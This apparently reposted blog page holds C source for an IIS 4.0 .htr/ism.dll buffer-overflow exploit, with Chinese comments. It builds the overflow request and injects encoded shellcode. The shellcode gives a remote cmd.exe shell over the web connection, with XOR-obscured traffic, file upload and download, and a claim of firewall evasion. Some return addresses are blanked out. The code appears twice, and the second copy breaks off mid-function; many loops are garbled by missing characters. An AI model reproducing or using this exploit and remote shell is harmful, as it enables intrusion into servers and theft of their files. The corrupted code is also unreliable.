windows下强大功能的溢出程序源代码
2012-07-15 23:12
169 查看
/*----------------------------------------------------------*/
/* IIS4.0的.htr映射ism.dll溢出攻击程序 */
/* 编写:yuange(yuange@nsfocus.com) */
/* 本程序实现所有语言版本WINDOWS下的溢出攻击。 */
/* SHELLCODE代码实现绑定cmd.exe功能,实现上传、 */
/* 下传文件的ftp功能,实现加密传输功能,不开 */
/* 端口、不开服务,可以绕过防火墙等。独创的实 */
/* 现源代码编写shellcode的办法,可以方便编写、 */
/* 修改、调试shellcode,使得编写强大功能的 */
/* shellcode成为可能。也解决了溢出攻击的几个根 */
/* 本问题:1、溢出点确定;2、shellcode定位; */
/* 3、jmp esp功能代码地址确定;4、WINDOWS的API */
/* 调用地址版本相关问题。另一个版本实现了接管 */
/* WWW功能,可以实现不修改WEB页面文件的情况下替 */
/* 换所有WEB页面。 */
/* 一般的溢出攻击程序也可以使用这个框架 */
/* */
/* 程序在vc6.0下编译通过 */
/*----------------------------------------------------------*/
/*
iis4。0 overflow program ver 1.0
copy by yuange 2000。05。8
*/
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。
// 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有
// 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,这儿数据不提供 2000.10.25 */
// 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
/* 由于一些原因,这儿数据不提供 2000.10.25 */
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com/ .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i
fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i if(buff[i]!=' ') break;
}
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i if(server[i]!=' ')
break;
}
if(i
for(i=0;i+3 if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i temp=shellcodebuff[i];
temp^=DATAXORCODE;
if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
/*
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
*/
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
/*
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
*/
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void shellcodefn(char *ecb)
{
char Buff[SHELLBUFFSIZE+2];
int *except[3];
FARPROC Sleepadd;
FARPROC GetLastErroradd;
FARPROC GetFileSizeadd;
FARPROC CreateFileAadd;
FARPROC WriteFileadd;
FARPROC ReadFileadd;
FARPROC PeekNamedPipeadd;
FARPROC CloseHandleadd;
FARPROC CreateProcessadd;
FARPROC CreatePipeadd;
FARPROC procloadlib;
FARPROC apifnadd[1];
FARPROC procgetadd=0;
FARPROC writeclient= *(int *)(ecb+0x84);
FARPROC readclient = *(int *)(ecb+0x88);
HCONN ConnID = *(int *)(ecb+8) ;
char *stradd;
int imgbase,fnbase,i,k,l;
HANDLE libhandle,fpt; //libwsock32;
STARTUPINFO siinfo;
PROCESS_INformATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
int lBytesRead;
int lockintvar1,lockintvar2;
char lockcharvar;
SECURITY_ATTRIBUTES sa;
_asm {
jmp nextcall
getstradd: pop stradd
lea EDI,except
mov eax,dword ptr FS:[0]
mov dword ptr [edi+0x08],eax
mov dword ptr FS:[0],EDI
}
except[0]=0xffffffff;
except[1]=stradd-0x07;
imgbase=0x77e00000;
_asm{
call getexceptretadd
}
for(;imgbase<0xbffa0000,procgetadd==0;){
imgbase+=0x10000;
if(imgbase==0x78000000) imgbase=0xbff00000;
if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
k=*(int *)(fnbase+0xc)+imgbase;
if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
libhandle=imgbase;
k=imgbase+*(int *)(fnbase+0x20);
for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
k+=*(int *)(fnbase+0x10)-1;
k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
procgetadd=k+imgbase;
break;
}
}
}
}
}
// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址
// 注意这儿处理了搜索页面不在情况。
_asm{
lea edi,except
mov eax,dword ptr [edi+0x08]
mov dword ptr fs:[0],eax
}
if(procgetadd==0) goto die ;
for(k=1;k apifnadd[k]=procgetadd(libhandle,stradd);
for(;;++stradd){
if(*(stradd)==0&&*(stradd+1)!=0) break;
}
++stradd;
}
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
_asm{
lea EDI,siinfo
xor eax,eax
mov ecx,0x11
repnz stosd
}
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// k=0;
// while(k==0){
k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
stradd+=8;
// }
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
k=8;
writeclient(ConnID,stradd+9,&k,0);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
while(1){
PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
if(lBytesRead>0){
ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if(lBytesRead>0){
for(k=0;k lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[k]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
}
}
else{
lBytesRead=SHELLBUFFSIZE;
l=0;
while(l==0){
k=readclient(ConnID,Buff,&lBytesRead);
for(l=0;l lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[l]^=lockcharvar;
}
if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]==' '){
l=*(int *)(Buff+4);
// WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0)
;
k=GetLastErroradd();
i=0;
while(l>0){
k=readclient(ConnID,Buff,&lBytesRead);
if(k==1){
if(lBytesRead>0){
for(k=0;k lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
Buff[k]^=lockcharvar;
}
l-=lBytesRead;
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
}
}
else{
Sleepadd(0100);
++i;
}
if(i>10000) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else{
if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3]==' '){
fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
Sleepadd(100);
l=GetFileSizeadd(fpt,&k);
*(int *)Buff='ezis'; //size
*(int *)(Buff+4)=l;
lBytesRead=8;
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
writeclient(ConnID,Buff,&lBytesRead,0);
// Sleepadd(100);
i=0;
while(l>0){
k=SHELLBUFFSIZE;
ReadFileadd(fpt,Buff,k,&k,0);
if(k>0){
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
Buff[i]^=lockcharvar;
}
i=0;
l-=k;
writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC);
// Sleepadd(100);
}
else ++i;
if(i>100) l=0;
}
CloseHandleadd(fpt);
l=0;
}
else l=1;
}
}
if(k!=1){
k=8;
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe
while(1){
Sleepadd(0x7fffffff); //僵死
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
_asm{
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i if(*str!=' '){
filename=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i if(*str!=' '){
filename2=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
newsend(fd,buff,size,0);
// Sleep(0100);
filesize-=size;
}
}
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i if(*str!=' '){
filename=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i if(*str!=' '){
filename2=str;
break;
}
}
for(;i if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
// Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
WriteFile(fpt,buff+8,i,&i,NULL);
filesize-=i;
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
WriteFile(fpt,buff,size,&size,NULL);
filesize-=size;
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
int newrecv(int fd,char *buff,int size,int flag)
{
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar;
}
}
return(k);
}
int newsend(int fd,char *buff,int size,int flag)
{
int i;
for(i=0;i lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar;
}
return(send(fd,buff,size,flag));
}
/* IIS4.0的.htr映射ism.dll溢出攻击程序 */
/* 编写:yuange(yuange@nsfocus.com) */
/* 本程序实现所有语言版本WINDOWS下的溢出攻击。 */
/* SHELLCODE代码实现绑定cmd.exe功能,实现上传、 */
/* 下传文件的ftp功能,实现加密传输功能,不开 */
/* 端口、不开服务,可以绕过防火墙等。独创的实 */
/* 现源代码编写shellcode的办法,可以方便编写、 */
/* 修改、调试shellcode,使得编写强大功能的 */
/* shellcode成为可能。也解决了溢出攻击的几个根 */
/* 本问题:1、溢出点确定;2、shellcode定位; */
/* 3、jmp esp功能代码地址确定;4、WINDOWS的API */
/* 调用地址版本相关问题。另一个版本实现了接管 */
/* WWW功能,可以实现不修改WEB页面文件的情况下替 */
/* 换所有WEB页面。 */
/* 一般的溢出攻击程序也可以使用这个框架 */
/* */
/* 程序在vc6.0下编译通过 */
/*----------------------------------------------------------*/
/*
iis4。0 overflow program ver 1.0
copy by yuange 2000。05。8
*/
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。
// 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有
// 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,这儿数据不提供 2000.10.25 */
// 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
/* 由于一些原因,这儿数据不提供 2000.10.25 */
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net/ .");
fprintf(stderr,"\n welcome to http://www.nsfocus.com/ .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i if(recvbuff[i]!=' ') break;
}
server=recvbuff;
if(i
fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i if(buff[i]!=' ') break;
}
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
*/
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i if(server[i]!=' ')
break;
}
if(i
for(i=0;i+3 if(server[i]==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
